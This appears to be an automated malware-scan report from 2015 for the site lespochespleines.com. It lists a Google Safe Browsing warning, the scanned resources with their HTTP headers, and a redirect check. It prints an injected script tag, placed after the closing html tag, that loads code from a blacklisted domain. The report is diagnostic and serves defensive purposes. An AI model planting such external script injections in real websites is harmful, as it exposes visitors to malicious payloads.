Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lespochespleines.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.lespochespleines.com/ | 200 OK Content-Length: 37349 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: segurosadsuar.com ...[4099 bytes skipped]... tion() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </body> </html> <script type="text/javascript" src="http://segurosadsuar.com/trkxcygh.php?id=8471009"></script> | ||
http://www.lespochespleines.com/system/other/javascript/prototype.js | 200 OK Content-Length: 139927 Content-Type: application/javascript | clean |
http://www.lespochespleines.com/system/other/javascript/exterieur.js | 200 OK Content-Length: 543 Content-Type: application/javascript | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 10689 Content-Type: text/javascript | clean |
http://www.google.fr/cse/brand?form=cse-search-box&lang=fr | 200 OK Content-Length: 2502 Content-Type: text/javascript | clean |
http://segurosadsuar.com/trkxcygh.php?id=8471009 | HTTP/1.1 302 Found Connection: close Date: Fri, 30 Jan 2015 03:56:33 GMT Location: http://localhost/ Server: Apache Content-Type: text/html X-SERVER: 102 | clean |
http://localhost/ | 200 OK Content-Length: 3883 Content-Type: text/html | clean |
http://localhost/terms.html | 200 OK Content-Length: 12789 Content-Type: text/html | clean |
http://localhost/privacy.html | 200 OK Content-Length: 13339 Content-Type: text/html | clean |
http://localhost/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 30 Jan 2015 03:56:09 GMT Location: http://sameid.net/limit.html Server: Apache/2.4.6 (Ubuntu) Content-Length: 212 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: uri=%2Ftest404page%2Ejs;Path=/;Max-Age=31536000 Set-Cookie: ref=direct;Path=/;Max-Age=31536000 | clean |
http://sameid.net/limit.html | 200 OK Content-Length: 5242 Content-Type: text/html | clean |
http://sameid.net/ | 200 OK Content-Length: 3883 Content-Type: text/html | clean |
http://sameid.net/terms.html | 200 OK Content-Length: 12789 Content-Type: text/html | clean |
http://sameid.net/privacy.html | 200 OK Content-Length: 13339 Content-Type: text/html | clean |
http://sameid.net/test404page.js | 404 Not Found Content-Length: 3296 Content-Type: text/html | clean |
http://localhost/order?plan=pp-oneday | HTTP/1.1 302 Found Connection: close Date: Fri, 30 Jan 2015 03:56:15 GMT Location: https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=iiveras.lt%40gmail.com&amount=9.99&no_note=1&custom=-1000-no-1-05646eca&no_shipping=1&return=http%3A%2F%2Fsameid.net%2Fthankyou&rm=2&item_name=SameID%20One%20Day%20Access%20-%201000%20requests Server: Apache/2.4.6 (Ubuntu) Content-Length: 467 Content-Type: text/html; charset=iso-8859-1 | clean |
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=iiveras.lt%40gmail.com&amount=9.99&no_note=1&custom=-1000-no-1-05646eca&no_shipping=1&return=http%3a%2f%2fsameid.net%2fthankyou&rm=2&item_name=sameid%20one%20day%20access%20-%201000%20requests | HTTP/1.1 302 Moved Temporarily Connection: close Connection: Transfer-Encoding Date: Fri, 30 Jan 2015 03:56:42 GMT Location: https://www.paypal.com/lt/cgi-bin/webscr?cmd=_flow&SESSION=SXcon3Z-aXpEVJ-PrW9vadw2Ju_GUhkEFleZd_zSdaWQjSnK-zMhUCKVEJO&dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b081987669d951670e57a34adba9dd19029ce5 Server: Apache Content-Encoding: gzip Content-Type: text/html DC: slc-b-origin-www-1.paypal.com Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=8e8hlkFcppDcnr5X4FWYpCc3rMo5RW0BN-5pa2gzXQyOQtC_xn4rE270MQDIljpGJ5PfxekpZflTH350tbeGLy0JrTBdebfCyVNDspy5ZzudDsi2bVT88GDVJBH2FGb7hjkS96NPAkdguqaDrNrb2fah9mToIIO8_SN1FutJW13Z2duSe60tuXGJmYgwlud8oE8NjWLIoGWtONFGPE36IPlu3Yj2GRLuSW-ntoZSPa8IYpr4gNg9X0ygTnC; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=w5XgtN75WOyVYHql9RGgzr4qq8uOg4g-1hBnrP8mHrJMBbib8aSgrhyCLTTKaGso8fN6wbRZUK8uQkAy; expires=Thu, 25-Jan-2035 03:56:41 GMT; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: cookie_check=yes; expires=Mon, 27-Jan-2025 03:56:41 GMT; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: navcmd=_xclick; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: abc_switch_cross_paypal=R1200%26WPSG%3da%40500%7c1422676601%7ce%3bv%3bw%3b6%26; expires=Sun, 10-May-2015 03:56:41 GMT; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: tYO7fcUaay8ZtLdfOSkkxbhU8o0=IC5WJaqhowolQUYB_VxMWWF7ffNJPJuxwss5EaALPYLj5Dstb0uQElaLw8vRQRC1RTHfTW; expires=Tue, 31-Mar-2015 03:56:41 GMT; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: pNTcMTtQfrJuaJiwEnWXQ6yNxfq=_q9bg55ZPu0jraT7LyhlW9ZicVKQpPJiG927shLRyMzuF3w9_9n1XEY5zJFUgnYHVCANqOxn6RGk1UcEEvIXkl4BHrCVvnF2IPa6UkWCTv1KHqlh4FWd4YHm87ywOeiixC6xuHN8MGMCfEZEGdBDWNU0VT-FTFpZOuoiR2HhUsBX_X1d1Il7pcuNjC4PUndF9L_Dk7ANdYHCCUXczufQRz6h3tQhEBUCR1k6KJQuW18HRbyjg9SOczvrETTL-0fLlCimeZIYk61Qf6u2te7E_ri5IEMXEhewiN6OMNFGEDLWy1aZOhCiQESEkBYpYWmmMOPVbbl6Ri6U6wp5KhrXYxJXaopGVpvOhikL1G6zLvoUNY3A; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: Apache=10.74.8.137.1422590201356122; path=/; expires=Sun, 22-Jan-45 03:56:41 GMT Set-Cookie: X-PP-SILOVER=name%3DLIVE6.WEB.1%26silo_version%3D880%26app%3Dappdisp%26TIME%3D4177578836; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: X-PP-SILOVER=; Expires=Thu, 01 Jan 1970 00:00:01 GMT Set-Cookie: Apache=10.74.8.37.1422590201345660; path=/; expires=Sun, 22-Jan-45 03:56:41 GMT Set-Cookie: AKDC=slc-b-origin-www-1.paypal.com; expires=Fri, 30-Jan-2015 04:26:42 GMT; path=/; secure Strict-Transport-Security: max-age=63072000 X-Frame-Options: SAMEORIGIN | clean |
https://www.paypal.com/lt/cgi-bin/webscr?cmd=_flow&session=sxcon3z-axpevj-prw9vadw2ju_guhkeflezd_zsdawqjsnk-zmhuckvejo&dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b081987669d951670e57a34adba9dd19029ce5 | 200 OK Content-Length: 14180 Content-Type: text/html | clean |
https://www.paypalobjects.com/WEBSCR-640-20150123-1/js/lib/min/global.js | 200 OK Content-Length: 61553 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lespochespleines.com
Result:
GET / HTTP/1.1
Host: lespochespleines.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: lespochespleines.com
Referer: http://www.google.com/search?q=lespochespleines.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lespochespleines.com
Referer: http://www.google.com/search?q=lespochespleines.com
Result:
The result is similar to the first query. There are no suspicious redirects found.